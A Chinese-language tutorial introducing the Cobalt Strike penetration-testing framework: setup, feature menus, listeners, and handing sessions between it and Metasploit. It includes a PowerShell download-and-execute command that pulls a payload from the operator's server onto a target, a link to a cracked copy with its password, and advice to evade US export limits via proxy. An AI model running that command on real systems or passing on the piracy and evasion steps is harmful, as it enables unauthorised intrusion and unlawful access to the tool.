Cobalt Strike 初体验

Cobalt Strike 一款以 metasploit 为基础的 GUI 的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。

钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等。

Cobalt Strike 主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和 sessions。

Cobalt Strike 据说现在最新版为 3.9,主要分为试用版和付费版,试用版为 21 天,付费版 3500 美元,据说网上也有一些破解教程

http://www.cnblogs.com/haq5201314/p/7040832.html

cobaltstrik3.6 破解版下载

https://pan.baidu.com/s/1qYocNbm 密码: 51tg。

因为 Cobalt Strike 是美国对外限制型出口软件,只在美国和加拿大允许发售,所以我们需要 google 搜索下 usa 的个人代理来绕开限制。

0x01 安装与运行

Cobalt Strike 需要 JAVA 环境,需要注意的是 JAVA 环境不要安装最新版,否则会出一些问题,Cobalt Strike 分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,或者自己想要搭建的环境中,服务器端只能运行在 Linux 系统上。其中关键的文件是 teamserver 以及 cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行:

./teamserver 192.168.3.32 test #自己的 IP 和密码

说一下我安装运行时遇到的坑:

首先:JAVA 版本必须为 8,否则就因版本问题无法编译运行;

其次:IP 必须为真实 IP,不能使用 0.0.0.0 或者 127.0.0.1,这样也会报错的。

服务器端运行之后,我们就可以运行客户端了,客户端可以在 Windows 或者 Linux 下都可以。

输入我们刚才 IP 以及端口、密码,用户名可以任意设置。

当攻击目标在控制台所操作的指令都会被记录到保留在 Cobalt Strike 目录 logs 下,对了,破解版是无法更新的。

0x02 参数详情

Cobalt Strike

New Connection #进行另外一个连接,支持连接多个服务器端 Preferences #设置 Cobal Strike 界面、控制台、以及输出报告样式、TeamServer 连接记录 Visualization #主要展示输出结果的形式 VPN Interfaces #设置 VPN 接口 Listenrs #创建一个 Listener Script Manager Close #退出连接

View

Applications #显示受害者机器的应用信息 Credentials #凭证当通过 hashdump 或者 Mimikatz 抓取过的密码都会储存在这里。 Downloads #下载文件 Event Log #主机上线记录以及团队协作聊天记录 Keystrokes #键盘记录 Proxy Pivots #代理模块 Screenshots #进程截图 Script Console #控制台,在这里可以加载各种脚本 https://github.com/rsmudge/cortana-scripts 以增强功能 Targets #显示目标 Web Log #Web访问记录

Attacks

Packages #攻击包 HTML Application 生成恶意的 HTA 木马文件 MS Office Macro 生成 office 宏病毒文件 Payload Generator 生成各种语言版本的 payload USB/CD AutoPlay 生成利用自动播放运行的木马文件 Windows Dropper 捆绑器,能够对文档类进行捆绑 Windows Executable 生成可执行 exe 木马 Windows Executable(S) 生成无状态的可执行 exe 木马 Web Drive-by #钓鱼攻击 Manage 对开启的 web 服务进行管理 Clone Site 克隆网站,可以记录受害者提交的数据 Host File 提供一个文件下载,可以修改 Mime 信息 PowerShell Web Delivery 类似于 msf 的 web_delivery Signed Applet Attack 使用 java 自签名的程序进行钓鱼攻击 Smart Applet Attack 自动检测 java 版本并进行攻击,针对 Java 1.6.0_45 以下以及 Java 1.7.0_21 以下版本 System Profiler 用来获取一些系统信息,比如系统版本,Flash 版本,浏览器版本等 Spear Phish #用来邮件钓鱼的模块

Reporting

activity report #活动报告生成 Hosts report #主机报告 Indicators opromisef com #目标报告 Sessions report #会话报告 Social engineering report #社会工程报告 Export data #数据出口

help

Homepage #官方主页 Support #技术支持 Arsenal #开发者 System information #版本信息 About #关于

0x03 基本运行

首先使用 Cobalt Strike 需要创建一个 Listener,点击 Cobalt Strike->Listeners ,然后点击 Add 便可以创建自己想要的 Listeners 了, Cobalt Strike3.6 包括

windows/beacon_dns/reverse_dns_txt windows/beacon_dns/reverse_http windows/beacon_http/reverse_http windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe windows/foreign/reverse_dns_txt windows/foreign/reverse_http windows/foreign/reverse_https windows/foreign/reverse_tcp

其中 windows/beacon 是 Cobalt Strike 自带的模块,包括 dns、http、https、smb 四种方式的监听器,windows/foreign 为外部监听器,即 msf 或者 Armitage 的监听器。选择监听器以后,host 会自动填写我们开启服务时的 ip,配置监听端口,然后保存,监听器就创建好了。

在创建好监听器,接下来就需要配置我们的客户端了,Cobalt Strike 提供了多种包括攻击方式,在这里我们使用 Powershell 进行攻击。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.83:8888/a'))"

当我们在目标靶机运行上面这条 Powershell 之后,我们的 Cobalt Strike 客户端就会监听到我们的反弹链接,我们就可以看到已经有目标机上线。

0x04 与 msf 进行联动

cs 获得了一个上线机器,想把这个机器丢给 msf 中的 meterpreter 获得一个 session 进行控制

这里我们已经获得了一个上线机器。

在 msf 上执行下面的命令:

之后使用 Cobalt Strike 创建一个 windows/foreign/reverse_tcp Listener,其中 ip 为 msf 的 ip 地址,端口为 msf 所监听的端口,

然后选中计算机,右键->Spawn:选择刚刚创建的监听器:

这个时候我们可以看到,msf上的监听已经上线,我们可以进行我们想要的一些操作了。

msf 获得了一个 meterpreter 的 session,想把 session 传给 cs

这里我们已经获得了一个 meterpreter 的 session

在CS中创建一个监听者,和上一步类似,这里host需要修改为CS客户端IP,创建好之后我们便监听着6666端口,等待着被控机连接。

此时我们切换到 meterpreter 中:

此时机器便已成功从 cs 成功上线,可以进行各种姿势的操作。

cs 获得了一个上线机器,想把这个机器丢给 msf 中继续进行渗透

根据上线的肉鸡,可以使用 SOCKS 代理

配置 proxychains.conf,添加 socks4 127.0.0.1 32557,然后就可以通过 proxychains 使用各种工具做内网渗透了。

总结

Cobalt Strike 还有很多的奇淫技巧,这里只是简单的描述了一下用法,大家可以搭建环境动手玩一玩,可能会了解到更多的玩法和乐趣。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2017-12-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏FreeBuf

一次对个人服务器入侵事件的调查

这一切还要从我收到的通知邮件:“Your server is sending spam”说起。首先要说的是,这台服务器是用来运行之前项目的静态网站,并不保存关键...

3845
来自专栏知识分享

邪恶改装:TPYBoard制作廉价WIFI干扰器

转载请注明:@小五义http://www.cnblogs.com/xiaowuyi

1967
来自专栏Golang语言社区

【Go 语言社区】linux常用网络服务端口一览表及详细分析

端口号码 / 层 名称 注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服...

4017
来自专栏针针小站

【Skill】宝塔Linux面板配合 七牛对象储存 进行网站日常备份

2102
来自专栏三丰SanFeng

浅谈DNS

什么叫域名解析 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来...

7057
来自专栏西枫里博客

联通宽带FTTH,华为hg8347r改桥接模式

家里宽带升级成50M光纤到户。换了一个光猫,导致我内网DMZ主机无法远程连接了。联通安装工程师安装好后,提供的是一个限制权限的user账户。除了能关闭wifi信...

3793
来自专栏沈唁志

解决cmder进入D盘目录不正确的方法

前两天就有群友问我cmder装好以后,进入D盘有点问题,输入d:,会进入到D:\cmder\config\profile.d 的路径下

6532
来自专栏耕耘实录

Firefox用户,一个不小心你们的密码可能已经被泄露

火狐(Firefox)浏览器是极客君比较常用的一个浏览器,在某次使用中,本人发现一个很有可能泄露使用者用户名及密码的缺陷,特此分享一下!

1223
来自专栏张戈的专栏

SEO分享:让百度删除不想收录的域名或快照的最快方法

个别网站可能会出现以下类似困扰: ①、百度收录了自己不想收录的域名,造成内容重复,比如张戈博客,百度近一半的收录是 www 的域名,而且收录的内容还是重复的!实...

9687
来自专栏FreeBuf

32764端口后门重出江湖,影响多款路由器

在年初的时候已经发布关于秘密后门——“TCP 32764”的报道,利用该后门漏洞,未授权的攻击者可以通过该端口访问设备,以管理员权限在受影响设备上执行设置内置操...

2169

扫码关注云+社区

领取腾讯云代金券